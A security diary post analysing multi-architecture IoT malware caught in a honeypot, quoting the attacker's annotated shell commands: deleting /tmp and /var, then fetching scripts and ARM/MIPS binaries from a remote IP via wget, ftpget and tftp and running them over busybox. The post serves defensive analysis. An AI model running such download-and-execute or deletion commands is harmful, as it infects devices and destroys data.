My next class:

More Multi-Architecture IoT Malware

Published: 2016-02-15. Last Updated: 2016-02-15 18:17:36 UTC
by Johannes Ullrich (Version: 1)
1 comment(s)

Attackers have problems too: Attacks against "Internet of Things" (IoT) devices are simple (as in "log in..."), but the attacker never knows what kind of architecture they may hit. IoT devices often go beyond the standard x86 architecture we are used to on our servers and workstations. What I typically see is the attempt to launch multiple binaries, compiled for different architectures, to see "what runs".

For example, this was the "#1" malware in our honeypot today:

After logging in, the attacker is running the following commands (comments and linebreaks added)

rm -rf /tmp/* /var/*;  # clean out /tmp... ouch. /var ? that can break stuff. 
cd /tmp || cd /var/;   # cd to /tmp or /var, whatever is available.

# download via http, ftp or tftp . whatever works
wget http://149.202.242.80/t.sh; sh t.sh;  
ftpget -u anonymous -p anonymous 149.202.242.80 tt.sh tt.sh;sh tt.sh;
tftp -r ttt.sh -g 149.202.242.80;sh ttt.sh

The binary downloaded looks like (here the wget version)

cp /bin/busybox ./;
wget http://149.202.242.80/arm;cat arm >busybox;rm -f arm; chmod 777 busybox;./busybox;
wget http://149.202.242.80/mips;cat mips >busybox;rm -f mips;./busybox;
wget http://149.202.242.80/mipsel;cat mipsel >busybox;rm -f mipsel;./busybox

so essentially, the standard "busybox" binary is replaces with one of the other binaries. In this case, an ARM, MIPS and MIPS Little Ending version is retrieved.

The "sad" part about this: These attackers appear to go through some length to compile these scripts for various platforms, but the don't appear to do much at all, or are just broken. This is probably another indication of how simple it is to go after the IoTs. 

FWIW: If you use a Raspberry Pi, make sure to change the default password!!!! I am seeing a LOT of attempts to use the default credentials.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Keywords:
1 comment(s)
My next class:

Comments

Since the attacker has already logged in, why try to guess the right binary? It's easier to detect the architecture and OS...

-M.

Diary Archives